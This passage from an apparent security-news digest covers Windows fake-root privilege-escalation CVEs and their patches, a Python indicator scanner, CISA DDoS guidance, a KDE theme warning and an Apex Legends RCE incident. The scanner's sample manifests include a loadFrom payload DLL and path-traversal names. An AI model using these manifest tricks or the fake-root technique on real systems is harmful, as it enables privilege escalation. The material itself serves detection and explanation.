+ ResumeImpersonation(TokenHandle);
+ }
NtOpenFile is called with the OBJ_IGNORE_IMPERSONATED_DEVICEMAP flag. It will stop impersonation when loading any external resources while using the LoadNewCopy API. Stopping impersonation means that privileged processes will not use the fake root implemented with the medium integrity process, and instead will use the original C:\ drive root to avoid loading untrusted or malicious resources.

Windows Error Reporting | CVE-2023-36874
Windows Error Reporting (WER) is a privileged service that analyzes and reports various software issues in Windows. The root cause for the exploitation of the CVE-2023-36874 vulnerability is the CreateProcess API when a crash happens, because the CreateProcess API can be tricked into following the fake root and creating the process from this writable fake root in the context of the privileged WER service, leading to privilege escalation. CVE-2023-36874 was exploited in the wild and has several published PoCs. The exploit interacts with the IWerReport COM interface and calls SubmitReport, then UtilLaunchWerManager is called, which calls CreateProcess. The CreateProcess API is then vulnerable to DOS device modification. Once the exploit to submit a fake crash report is executed, it will end up calling the vulnerable CreateProcess API.

File History Service | CVE-2023-35359
File History Service can be used to automatically back up personal folders and files such as documents, pictures and videos. Reversing the in-the-wild exploit shows that when File History Service starts, it impersonates the current user and then loads a DLL called fhcfg.dll under impersonation. This DLL has an “application aware manifest config” that attempts to load another resource called msasn1.dll. The exploit starts with the usual technique of changing the C:\ root to a fake writable root.

Windows Error Reporting – 2nd exploit | CVE-2023-35359
After patching the first Windows Error Reporting vulnerability, which used the CreateProcess API inside the privileged WER service and followed the fake root to create a process, the patched WER service started using CreateProcessAsUser instead of the CreateProcess API. However, after that patch, adversaries found another way that could lead to the use of CreateProcess again under certain conditions, which was considered a new vulnerability. For example, if the WER service was marked as disabled on a system and there was a privileged process impersonating a medium-integrity user on that system, and an unhandled exception occurred during impersonation that resulted in a crash, that crash would try to enable the WER service for reporting. The detailed analysis for this CVE shows that it does not appear to be exploitable.
Figure: The exploitation of CVE-2023-35359

BITS | CVE-2023-35359
The Background Intelligent Transfer Service (BITS) is responsible for facilitating the asynchronous and prioritized transfer of files between a client and a server. BITS operates in the background, which means it can perform file transfers without interrupting a user or consuming all of the available network bandwidth.

You may notice that the number CVE-2023-35359 has not changed for the last three CVEs because Microsoft decided in the last patch to assign the same CVE to all vulnerabilities of this type. So there are different vulnerabilities in different processes/services but with the same CVE number.
Figure: Timeline for the bypassing/patching process from 2015 to August 2023

How was the patch for this attack surface applied?
The patch was applied to ObpLookupObjectName to check if the loaded resource is a file object and the call to ObpUseSystemDeviceMap succeeds. It then ignores the impersonation and uses SystemDevice. ObpLookupObjectName checks FileObjectType followed by a call to ObpUseSystemDeviceMap. The ObpUseSystemDeviceMap function checks for the SystemDevice to be used instead of the impersonated device.

How to check if a vulnerability was exploited or any attempts were made to exploit it?
When analyzing most of the exploits targeting this attack surface, we observed a common behavior that could be used as an indicator of whether there were any attempted exploits:
Most of the in-the-wild exploits create a writable folder inside the C:\ drive, and the structure of this folder mimics the structure of the original C:\ drive, for example:
C:\Windows\System32 → C:\FakeFolder\Windows\System32
C:\Windows\WinSxS → C:\FakeFolder\Windows\WinSxS
So finding a writable folder that mimics the C:\ drive folder structure may be an indicator of an exploitation attempt.
Copying the manifest files from the original WinSxS folder in C:\Windows\WinSxS to a writable directory and modifying them could be a good indicator of an exploitation attempt.
Manifest files that contain undocumented XML attributes such as “LoadFrom” or manifest files that contain path traversal in the “name” attribute could be a valid sign of an exploitation attempt.
Creating a symbolic link from the original system drive to a writable directory, especially from processes with medium integrity using the \RPC Control\ object directory.
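As an added example (not code from the Kaspersky article, Microsoft or any of the PoC authors it mentions), the following Python script turns the file-system indicators listed above into a scan you can run over a mounted disk image on any OS, or over the drive root of a live host: a non-system directory that mirrors Windows\System32 and Windows\WinSxS, a side-by-side manifest carrying the undocumented loadFrom attribute, and a manifest whose assemblyIdentity name contains a path separator. The sample manifests, the assembly names inside them and the realroot/Imprint tree that build_demo() lays out in a temporary directory are constructed for the demo. The fourth indicator, a \RPC Control\ symbolic link created by a medium-integrity process, lives in the object manager namespace rather than on disk and is out of scope for a file scan.

```python
"""Scan for host indicators of fake-C:\\-root (DOS device map) exploit attempts.
Added example, not code from the Kaspersky GERT article: it implements the three
file-system indicators the article lists. Manifests, names and the directory tree
built by build_demo() are constructed for the demo."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Subtrees whose presence under a non-system directory mimics C:\ (the two the
# article names; extend the tuple for a stricter or looser match).
MIMIC_SUBDIRS = (os.path.join("Windows", "System32"), os.path.join("Windows", "WinSxS"))

# Constructed sample manifests; assembly names and paths are made up.
BENIGN_MANIFEST = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Example.Benign.Assembly" version="1.0.0.0"/>
  <file name="benign.dll"/>
</assembly>"""
LOADFROM_MANIFEST = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Example.Privileged.App" version="1.0.0.0"/>
  <file name="payload.dll" loadFrom="C:\Imprint\payload.dll"/>
</assembly>"""
TRAVERSAL_MANIFEST = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <dependency><dependentAssembly>
    <assemblyIdentity type="win32" name="..\..\Imprint\Windows\WinSxS\evil" version="1.0.0.0"/>
  </dependentAssembly></dependency>
</assembly>"""


def manifest_indicators(xml_data) -> list:
    """Return the suspicious features found in one manifest (empty list = clean)."""
    try:
        root = ET.fromstring(xml_data.encode("utf-8") if isinstance(xml_data, str) else xml_data)
    except ET.ParseError as exc:
        return [f"unparseable manifest: {exc}"]
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # strip the asm.v1 namespace
        for attr, value in elem.attrib.items():
            # Case-insensitive: the article spells it both "loadFrom" and "LoadFrom".
            if attr.rsplit("}", 1)[-1].lower() == "loadfrom":
                findings.append(f"loadFrom attribute on <{tag}>: {value}")
        if tag == "assemblyIdentity" and ("/" in elem.get("name", "") or "\\" in elem.get("name", "")):
            findings.append(f"path traversal in assemblyIdentity name: {elem.get('name')}")
    return findings


def scan(scan_root: str, system_root: str) -> dict:
    """Walk scan_root; report copycat roots and tampered manifests. system_root is the
    genuine drive root (C:\\ live, or an image mount): never flagged, Windows tree skipped."""
    system_root = os.path.normcase(os.path.abspath(system_root))
    report = {"fake_roots": [], "manifests": {}}
    for dirpath, dirnames, filenames in os.walk(scan_root):
        if os.path.normcase(os.path.abspath(dirpath)) == system_root:
            dirnames[:] = [d for d in dirnames if d.lower() != "windows"]
            continue
        if all(os.path.isdir(os.path.join(dirpath, sub)) for sub in MIMIC_SUBDIRS):
            # os.access only approximates the NTFS ACL check; confirm with icacls.
            report["fake_roots"].append((dirpath, os.access(dirpath, os.W_OK)))
        for fn in filenames:
            if not fn.lower().endswith(".manifest"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                findings = manifest_indicators(fh.read())
            if findings:
                report["manifests"][path] = findings
    return report


def build_demo(tmp: str):
    """Create a stand-in system root plus a copycat 'Imprint' root (the fake-root name
    from the article's Print Spooler sample) holding one clean and two tampered manifests."""
    real, fake = os.path.join(tmp, "realroot"), os.path.join(tmp, "Imprint")
    for base in (real, fake):
        for sub in MIMIC_SUBDIRS:
            os.makedirs(os.path.join(base, sub))
    samples = {
        os.path.join(fake, "Windows", "System32", "benign.manifest"): BENIGN_MANIFEST,
        os.path.join(fake, "Windows", "WinSxS", "loadfrom.manifest"): LOADFROM_MANIFEST,
        os.path.join(fake, "Windows", "WinSxS", "traversal.manifest"): TRAVERSAL_MANIFEST,
    }
    for path, text in samples.items():
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
    return tmp, real


def run_demo() -> dict:
    """Build the throwaway tree in a temp dir, scan it, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan(*build_demo(tmp))


if __name__ == "__main__":
    print(run_demo())
```

On a live host call scan("C:\\", "C:\\"); on a mounted image pass the mount point as both arguments. The genuine Windows tree is skipped both because it legitimately contains System32 and WinSxS and because walking it is slow, so a tampered copy of a manifest is only caught where attackers actually place it, outside that tree. The loadFrom check matches the attribute on any element, not only <file>, and the assemblyIdentity check flags any slash in a name, which is the same rule the article describes for the CVE-2022-37989 patch; review hits by hand, since the writability flag from os.access does not evaluate NTFS ACLs.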
  13. The United States government updated its Distributed Denial of Service (DDoS) guidelines in March 2024.

The updated guidelines, released by the Cybersecurity and Infrastructure Security Agency (CISA), provide comprehensive recommendations and best practices to mitigate the impact of DDoS attacks. These guidelines are designed to help organizations across various sectors, including government agencies, private enterprises, and critical infrastructure operators, better defend against and respond to DDoS incidents.

DoS and DDoS
A DoS and a DDoS attack are similar in that they both aim to disrupt the availability of a target system or network. However, there are key differences between the two.
1. DoS Attack: A DoS attack involves a single source used to overwhelm the target system with a flood of traffic or resource-consuming requests. The malicious actor typically uses one computer or a small number of computers to generate the attack. The goal of a DoS attack is to render the target system unavailable to its intended users and deny them access to resources or services.
2. DDoS Attack: A DDoS attack involves multiple sources. Often, a multitude of compromised computers, known as botnets, are coordinated to launch the attack. Each machine in the botnet sends a flood of traffic or requests to the target system simultaneously to amplify the follow-on impact. Due to the distributed nature of a DDoS attack, defending targeted networks is more difficult than defending against a DoS attack. The main advantage of a DDoS attack over a DoS attack is the ability to generate a significantly higher volume of traffic, overwhelming the target system’s resources to a greater extent. DDoS attacks can also employ various techniques, such as IP spoofing, which involves a malicious actor manipulating the source IP address, and botnets, to disguise the origin of the attack and make it more difficult to trace back to them.
In terms of impact, both DoS and DDoS attacks can disrupt the availability of a targeted system or network, leading to service outages, financial losses, and reputational damage.

DoS and DDoS Attacks Categorized Into Three Technique Types
1. Volume-Based Attacks: These attacks aim to consume the available bandwidth or system resources of the target by overwhelming it with a massive volume of traffic. The goal is to saturate the network or exhaust the target’s resources, rendering it unable to handle legitimate requests.

Source: taken from the PDF file; the rest can be found at the bottom of the post via the PDF link.

The updated guidelines underscore the evolving nature of cyber threats and the need for proactive measures to safeguard digital assets and critical infrastructure. By adopting these guidelines and investing in cybersecurity measures, organizations can strengthen their resilience against DDoS attacks and contribute to a more secure cyber landscape.

The guideline can be found here: https://www.cisa.gov/sites/default/files/2024-03/Understanding and Responding to Distributed Denial-of-Service Attacks_508c.pdf
  14. WARNING: Global themes and widgets created by 3rd-party developers for Plasma can and will run arbitrary code. You are encouraged to exercise extreme caution when using these products.

A user had a bad experience installing a global theme on Plasma and lost personal data.
https://www.reddit.com/r/kde/comments/1bixmbx/do_not_install_global_themes_some_wipe_out_all/

Global themes change the look of Plasma, but also the behavior. To do this they run code, and this code can be faulty, as in the case mentioned above. The same goes for widgets and plasmoids.

For now, as a caution, better not to download any custom themes for Plasma KDE Linux.
https://floss.social/@kde/112128243960545659
  15. Due to cheats being used in the final, the tournament was postponed, and a Twitter post by Apex Legends Esports states the following:

Easy Anti-Cheat stated this afterwards:

According to the PCGamesN website:

Midway through their match on Storm Point, TSM’s Phillip ‘ImperialHal’ Dosen and DarkZero’s Noyan ‘Genburten’ Ozkose were both hit by what appears to be an RCE hack, meaning that the bad actor could, in theory, manipulate elements of their games. As a result, both players had their cheats toggled on instead of off, hence Hal’s “I’ve got an aimbot.” Additionally, as the hack went through, a bizarre message seems to have popped up on Genburten’s screen, showing that cheats were, in fact, switched on mid-match. As a result, Respawn terminated the match, officially stating that “due to the competitive integrity of this series being compromised, we have made the decision to postpone the NA finals at this time. We will share more information soon.”

---

It is quite weird and funny how even in tournaments, gamers will still try to cheat while the anti-cheat software or the people who monitor are almost useless. Paying a license to anti-cheat software as a developer that won't be able to protect your game even in a country-wide tournament is quite an astonishing disappointment. EAC clarifying that their software is not vulnerable but not clarifying about the cheat being undetected is also more funny. Gamers were hacking their way to the 2 million.